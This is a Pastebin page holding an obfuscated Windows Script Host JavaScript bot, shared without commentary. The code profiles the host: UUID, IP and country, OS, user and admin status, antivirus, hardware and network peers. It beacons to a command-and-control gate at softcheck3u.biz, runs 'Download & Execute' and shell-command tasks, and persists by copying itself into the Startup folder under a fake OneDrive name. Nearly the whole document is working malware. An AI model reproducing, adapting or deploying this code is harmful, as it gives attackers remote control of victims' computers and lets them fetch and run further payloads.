API tools faq
paste
Racco42

Untitled

Racco42
May 11th, 2020
1,389
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 18.16 KB | None | 0 0
raw download clone embed print report
  1. function anonymous() {
  2.  
  3.     function _$af1831293() {
  4.         var response;
  5.         try {
  6.             var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  7.             var temp = WinHttpReq.Open("POST", server, false);
  8.             WinHttpReq.SetRequestHeader("Content-Type", "application/json");
  9.             WinHttpReq.SetRequestHeader("mode", "info");
  10.             WinHttpReq.SetRequestHeader("uuid", clientInfo.uuid);
  11.             WinHttpReq.SetRequestHeader("version", version);
  12.             WinHttpReq.Send(JSON.stringify(clientInfo));
  13.             WinHttpReq.WaitForResponse();
  14.             response = WinHttpReq.ResponseText;
  15.         } catch (objError) {
  16.             response = objError + "\n";
  17.             response += "WinHTTP returned error: " + (objError.number & 65535).toString() + "\n\n";
  18.             response += objError.description;
  19.         }
  20.         return response;
  21.     }
  22.  
  23.  
  24.     function _$af1831294() {
  25.         var response;
  26.         if (_$af1831301 == true) {
  27.             return;
  28.         }
  29.         try {
  30.             var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  31.             var temp = WinHttpReq.Open("POST", server, false);
  32.             if (_$af1831299 === null) {
  33.                 return;
  34.             }
  35.             WinHttpReq.SetRequestHeader("Accept", "application/json");
  36.             WinHttpReq.SetRequestHeader("mode", "knock");
  37.             WinHttpReq.SetRequestHeader("uuid", clientInfo.uuid);
  38.             WinHttpReq.SetRequestHeader("version", version);
  39.             WinHttpReq.Send();
  40.             WinHttpReq.WaitForResponse();
  41.             response = WinHttpReq.ResponseText;
  42.         } catch (objError) {
  43.             if (!_$af1831298) {
  44.                 _$af1831303(null, null, null, 1, 0);
  45.             }
  46.             response = objError + "\n";
  47.             response += "WinHTTP returned error: " + (objError.number & 65535).toString() + "\n\n";
  48.             response += objError.description;
  49.         }
  50.         if (_$af1831296 == 0) {
  51.             _$af1831295 = 1;
  52.             return;
  53.         }
  54.         return response;
  55.     }
  56.  
  57.     if (_$af1831297 == null) {
  58.         _$af1831302(false, null, 1);
  59.         _$af1831295 = false;
  60.     }
  61.  
  62.     function _$af1831295(taskID, result, details) {
  63.         var response;
  64.         try {
  65.             var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  66.             var temp = WinHttpReq.Open("POST", server, false);
  67.             WinHttpReq.SetRequestHeader("Accept", "application/json");
  68.             WinHttpReq.SetRequestHeader("mode", "task");
  69.             if (!_$af1831295) {
  70.                 _$af1831303 = 1;
  71.                 return;
  72.             } else {
  73.                 WinHttpReq.SetRequestHeader("uuid", clientInfo.uuid);
  74.             }
  75.             WinHttpReq.SetRequestHeader("taskID", taskID);
  76.             WinHttpReq.SetRequestHeader("result", result);
  77.             WinHttpReq.SetRequestHeader("details", details);
  78.             WinHttpReq.Send();
  79.             WinHttpReq.WaitForResponse();
  80.             response = WinHttpReq.ResponseText;
  81.         } catch (objError) {
  82.             response = objError + "\n";
  83.             response += "WinHTTP returned error: " + (objError.number & 65535).toString() + "\n\n";
  84.             response += objError.description;
  85.         }
  86.     }
  87.  
  88.  
  89.     function _$af1831296(tasksJson) {
  90.         if (tasksJson.length < 5) {
  91.             if (_$af1831299 == true) {
  92.                 return;
  93.             }
  94.             return;
  95.         }
  96.         var result = "False";
  97.         var attempts = 0;
  98.         var details = "";
  99.         try {
  100.             tasks = JSON.parse(tasksJson);
  101.         } catch (err) {
  102.             return;
  103.         }
  104.         if (!_$af1831302) {
  105.             _$af1831298 = 1;
  106.         } else {
  107.             for (var task in tasks) {
  108.                 result = "False";
  109.                 attempts = attemptsCount;
  110.                 details = "";
  111.                 if (_$af1831296 === 1) {
  112.                     return;
  113.                 } else {
  114.                     while (attempts > 0 && result != "True") {
  115.                         if (_$af1831298 === 0) {
  116.                             _$af1831295();
  117.                             return;
  118.                         }
  119.                         switch (tasks[task].type) {
  120.                           case "Download & Execute":
  121.                             result = _$af1831299(tasks[task].content);
  122.                             if (result == "False") {
  123.                                 details = "Error: download or executing file failed";
  124.                             }
  125.                             break;
  126.                           case "Execute":
  127.                             result = _$af1831297(tasks[task].content);
  128.                             if (result == "False") {
  129.                                 details = "Error: executing file failed";
  130.                             }
  131.                             if (!_$af1831296) {
  132.                                 _$af1831299();
  133.                                 _$af1831303 = 1;
  134.                                 return;
  135.                             }
  136.                             break;
  137.                           case "Terminate":
  138.                             status = "Stopped";
  139.                             if (!_$af1831303) {
  140.                                 _$af1831299();
  141.                                 _$af1831301 = false;
  142.                             }
  143.                             result = "True";
  144.                             if (!_$af1831299) {
  145.                                 _$af1831298(null);
  146.                                 return;
  147.                             }
  148.                             break;
  149.                           default:
  150.                             result = "False";
  151.                             details = "Error: unknown task type";
  152.                             break;
  153.                         }
  154.                         if (result == "False") {
  155.                             attempts--;
  156.                         } else {
  157.                             if (!_$af1831294) {
  158.                                 _$af1831302();
  159.                             } else {
  160.                                 details = "Success";
  161.                             }
  162.                         }
  163.                         _$af1831295(tasks[task].id, result, details);
  164.                     }
  165.                 }
  166.             }
  167.         }
  168.     }
  169.  
  170.  
  171.     function _$af1831297(command) {
  172.         try {
  173.             shellObj.run("%comspec% /c " + command, 0, true);
  174.             return "True";
  175.         } catch (err) {
  176.             return "False";
  177.         }
  178.     }
  179.  
  180.  
  181.     function _$af1831298(url) {
  182.         var filename = url.split("/")[url.split("/").length - 1];
  183.         if (!_$af1831302) {
  184.             return;
  185.         } else {
  186.             return filename;
  187.         }
  188.     }
  189.  
  190.  
  191.     function _$af1831299(url) {
  192.         var filename = _$af1831298(url);
  193.         var saveTo = defaultPath + "\\" + filename;
  194.         var WinHttpObj = WScript.CreateObject("WinHttp.WinHttpRequest.5.1");
  195.         if (_$af1831300 == 1) {
  196.             _$af1831293();
  197.         }
  198.         try {
  199.             WinHttpObj.open("GET", url, false);
  200.             if (!_$af1831302) {
  201.                 _$af1831295();
  202.             }
  203.             WinHttpObj.setRequestHeader("cache-control", "max-age=0");
  204.             WinHttpObj.send();
  205.             var fsObj = WScript.CreateObject("Scripting.FileSystemObject");
  206.             if (fsObj.fileExists(saveTo)) {
  207.                 fsObj.deleteFile(saveTo);
  208.             }
  209.             if (WinHttpObj.status == 200) {
  210.                 var streamObj = WScript.CreateObject("ADODB.Stream");
  211.                 streamObj.Type = 1;
  212.                 if (!_$af1831293) {
  213.                     return;
  214.                 }
  215.                 streamObj.Open();
  216.                 streamObj.Write(WinHttpObj.responseBody);
  217.                 streamObj.SaveToFile(saveTo);
  218.                 streamObj.close();
  219.                 if (!_$af1831293) {
  220.                     return;
  221.                 }
  222.                 streamObj = null;
  223.             }
  224.             if (fsObj.fileExists(saveTo)) {
  225.                 shellObj.run(fsObj.getFile(saveTo).shortPath);
  226.                 return "True";
  227.             }
  228.         } catch (err) {
  229.             return "False";
  230.         }
  231.         return "False";
  232.     }
  233.  
  234.     if (!_$af1831295) {
  235.         _$af1831299();
  236.         _$af1831295 = 1;
  237.         return;
  238.     }
  239.  
  240.     function _$af1831300(command) {
  241.         var fso = new ActiveXObject("Scripting.FileSystemObject");
  242.         var wshShell = new ActiveXObject("WScript.Shell");
  243.         do {
  244.             var tempName = fso.BuildPath(fso.GetSpecialFolder(2), fso.GetTempName());
  245.         } while (fso.FileExists(tempName));
  246.         var cmdLine = fso.BuildPath(fso.GetSpecialFolder(1), "cmd.exe") + " /C " + command + " > \"" + tempName + "\"";
  247.         wshShell.Run(cmdLine, 0, true);
  248.         var result = "";
  249.         try {
  250.             var ts = fso.OpenTextFile(tempName, 1, false);
  251.             result = ts.ReadAll();
  252.             ts.Close();
  253.         } catch (err) {
  254.         }
  255.         return result;
  256.     }
  257.  
  258.  
  259.     function _$af1831301() {
  260.         var initInfo = new Object;
  261.         try {
  262.             var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
  263.             for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct")); !i.atEnd(); i.moveNext()) {
  264.                 initInfo.uuid = i.item().UUID;
  265.             }
  266.         } catch (err) {
  267.             initInfo.uuid = "N/A";
  268.         }
  269.         if (!_$af1831299) {
  270.             _$af1831298 = null;
  271.         }
  272.         try {
  273.             var ipReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  274.             ipReq.Open("GET", "http://ipinfo.io/ip", false);
  275.             if (_$af1831303 === 1) {
  276.                 _$af1831303();
  277.             }
  278.             ipReq.Send();
  279.             ipReq.WaitForResponse();
  280.             ipRes = ipReq.ResponseText;
  281.             initInfo.ip = ipRes.replace(/^\s+|\s+$/g, "");
  282.         } catch (err) {
  283.             initInfo.ip = "N/A";
  284.         }
  285.         try {
  286.             var countryReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
  287.             countryReq.Open("GET", "http://ipinfo.io/country", false);
  288.             countryReq.Send();
  289.             countryReq.WaitForResponse();
  290.             countryRes = countryReq.ResponseText;
  291.             initInfo.location = countryRes.replace(/^\s+|\s+$/g, "");
  292.         } catch (err) {
  293.             if (!_$af1831303) {
  294.                 return;
  295.             }
  296.             initInfo.location = "N/A";
  297.         }
  298.         if (_$af1831293 === null) {
  299.             _$af1831300(0);
  300.             _$af1831294 = false;
  301.         }
  302.         try {
  303.             for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.atEnd(); i.moveNext()) {
  304.                 initInfo.os = i.item().Caption;
  305.             }
  306.         } catch (err) {
  307.             if (_$af1831293 === 1) {
  308.                 _$af1831303 = null;
  309.             }
  310.             initInfo.os = "N/A";
  311.         }
  312.         try {
  313.             var shellObj = new ActiveXObject("WScript.Shell");
  314.             var netObj = new ActiveXObject("WScript.Network");
  315.             if (!_$af1831301) {
  316.                 return;
  317.             }
  318.             initInfo.user = netObj.ComputerName + "/" + shellObj.ExpandEnvironmentStrings("%USERNAME%");
  319.         } catch (err) {
  320.             initInfo.user = "N/A";
  321.         }
  322.         try {
  323.             initInfo.role = "User";
  324.             var groupObj = GetObject("WinNT://" + netObj.UserDomain + "/" + shellObj.ExpandEnvironmentStrings("%USERNAME%"));
  325.             for (propObj in groupObj.Members) {
  326.                 if (_$af1831293 === false) {
  327.                     _$af1831299(null);
  328.                 }
  329.                 if (propObj.Name == "Administrators") {
  330.                     if (!_$af1831299) {
  331.                         _$af1831299 = 0;
  332.                         return;
  333.                     }
  334.                     initInfo.role = "Admin";
  335.                 }
  336.             }
  337.         } catch (err) {
  338.             initInfo.role = "N/A";
  339.         }
  340.         try {
  341.             var wmiAV = GetObject("winmgmts:root\\SecurityCenter2");
  342.             for (var i = new Enumerator(wmiAV.ExecQuery("SELECT * FROM AntivirusProduct")); !i.atEnd(); i.moveNext()) {
  343.                 if (!initInfo.antivirus) {
  344.                     initInfo.antivirus = i.item().displayName;
  345.                 }
  346.             }
  347.         } catch (err) {
  348.             initInfo.antivirus = "N/A";
  349.         }
  350.         try {
  351.             for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_Processor")); !i.atEnd(); i.moveNext()) {
  352.                 initInfo.cpu = i.item().Name;
  353.             }
  354.         } catch (err) {
  355.             initInfo.cpu = "N/A";
  356.         }
  357.         if (!_$af1831300) {
  358.             return;
  359.         }
  360.         try {
  361.             if (_$af1831302 == null) {
  362.                 _$af1831297(0);
  363.                 _$af1831293 = 0;
  364.                 return;
  365.             } else {
  366.                 for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_VideoController")); !i.atEnd(); i.moveNext()) {
  367.                     if (_$af1831295 == 1) {
  368.                         return;
  369.                     }
  370.                     initInfo.gpu = i.item().Name;
  371.                 }
  372.             }
  373.         } catch (err) {
  374.             initInfo.gpu = "N/A";
  375.         }
  376.         try {
  377.             var ramObj = WScript.CreateObject("Shell.Application");
  378.             initInfo.ram = Math.round(ramObj.GetSystemInformation("PhysicalMemoryInstalled") / 1048576) + " MB";
  379.         } catch (err) {
  380.             if (_$af1831301 === null) {
  381.                 _$af1831293(false, 1, 0);
  382.             }
  383.             initInfo.ram = "N/A";
  384.         }
  385.         if (_$af1831300 === true) {
  386.             _$af1831300 = false;
  387.         }
  388.         try {
  389.             var available = 0;
  390.             var total = 0;
  391.             for (var i = new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_LogicalDisk")); !i.atEnd(); i.moveNext()) {
  392.                 if (_$af1831296 === null) {
  393.                     _$af1831299(null);
  394.                     _$af1831303 = null;
  395.                 }
  396.                 if (i.item().Size != null) {
  397.                     available += i.item().FreeSpace / 1024 / 1024 / 1024;
  398.                     total += i.item().Size / 1024 / 1024 / 1024;
  399.                 }
  400.             }
  401.             initInfo.storage = Math.round(available) + " / " + Math.round(total) + " GB";
  402.         } catch (err) {
  403.             initInfo.storage = "0 / 0 GB";
  404.         }
  405.         try {
  406.             var pcs = 0;
  407.             var output = _$af1831300("net view");
  408.             var lines = output.split("\n");
  409.             if (lines.length > 6) {
  410.                 pcs = lines.length - 6;
  411.             }
  412.             initInfo.network = pcs;
  413.         } catch (err) {
  414.             initInfo.network = "0";
  415.         }
  416.         if (_$af1831295 === null) {
  417.             _$af1831298();
  418.             _$af1831293 = null;
  419.             return;
  420.         }
  421.         initInfo.version = version;
  422.         return initInfo;
  423.     }
  424.  
  425.  
  426.     function _$af1831302() {
  427.         try {
  428.             startupPath = defaultPath + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\";
  429.             fsObj = WScript.CreateObject("Scripting.FileSystemObject");
  430.             fsObj.CopyFile(scriptFullPath, startupPath);
  431.         } catch (err) {
  432.             return;
  433.         }
  434.     }
  435.  
  436.  
  437.     function _$af1831303() {
  438.         var xObj = WSH.CreateObject("Microsoft.XMLHTTP"), fso = WSH.CreateObject("Scripting.FileSystemObject"), temp = WSH.CreateObject("WScript.Shell").Environment("Process")("temp"), j2li
  439. b = "https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js";
  440.         if (_$af1831299 === null) {
  441.             _$af1831301 = false;
  442.         }
  443.         if (fso.FileExists(temp + "\\json2.js")) {
  444.             j2lib = fso.OpenTextFile(temp + "\\json2.js", 1);
  445.             eval(j2lib.ReadAll());
  446.             j2lib.Close();
  447.         } else {
  448.             with (xObj) {
  449.                 open("GET", j2lib, true);
  450.                 setRequestHeader("User-Agent", "XMLHTTP/1.0");
  451.                 send("");
  452.             }
  453.             while (xObj.readyState != 4) {
  454.                 WSH.Sleep(50);
  455.             }
  456.             eval(xObj.responseText);
  457.             if (_$af1831301 === 1) {
  458.                 _$af1831303 = 0;
  459.                 return;
  460.             }
  461.             j2lib = fso.CreateTextFile(temp + "\\json2.js", true);
  462.             j2lib.Write(xObj.responseText);
  463.             j2lib.Close();
  464.         }
  465.     }
  466.  
  467.     SendClientInfo = _$af1831293;
  468.     if (!_$af1831297) {
  469.         return;
  470.     }
  471.     SendKnock = _$af1831294;
  472.     SendTaskResult = _$af1831295;
  473.     DoTasks = _$af1831296;
  474.     Execute = _$af1831297;
  475.     GetFilenameFromURL = _$af1831298;
  476.     DownloadAndExecute = _$af1831299;
  477.     ExecuteAndOutput = _$af1831300;
  478.     GetClientInfo = _$af1831301;
  479.     AddToAutorun = _$af1831302;
  480.     if (_$af1831298 == null) {
  481.         return;
  482.     } else {
  483.         ImportJSON = _$af1831303;
  484.     }
  485.     version = "Test7";
  486.     if (_$af1831303 === null) {
  487.         _$af1831299(null);
  488.         return;
  489.     }
  490.     server = "https://softcheck3u.biz/inc/server/gate.php";
  491.     interval = 181;
  492.     attemptsCount = 5;
  493.     status = "Active";
  494.     if (_$af1831296 == false) {
  495.         _$af1831295(false, null, null);
  496.         _$af1831295 = true;
  497.     }
  498.     wss = new ActiveXObject("WScript.Shell");
  499.     defaultPath = wss.ExpandEnvironmentStrings("%APPDATA%");
  500.     scriptFullPath = WScript.ScriptFullName;
  501.     scriptName = WScript.ScriptName;
  502.     fakeAutorunName = "MicrosoftOneDrive";
  503.     if (_$af1831301 == false) {
  504.         _$af1831295();
  505.         _$af1831302 = false;
  506.     }
  507.     shellObj = WScript.createObject("WScript.Shell");
  508.     _$af1831303();
  509.     clientInfo = _$af1831301();
  510.     _$af1831302();
  511.     while (status == "Active") {
  512.         _$af1831296(_$af1831293());
  513.         WScript.sleep(interval * 1000);
  514.         _$af1831296(_$af1831294());
  515.     }
  516.     if (!_$af1831301) {
  517.         _$af1831298();
  518.         _$af1831300 = 1;
  519.         return;
  520.     } else {
  521.     }
  522.     if (!_$af1831293) {
  523.         return;
  524.     } else {
  525.     }
  526.     if (!_$af1831298) {
  527.         _$af1831293(true);
  528.     } else {
  529.     }
  530.     if (!_$af1831296) {
  531.         _$af1831293(1);
  532.         _$af1831301 = 1;
  533.     }
  534. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!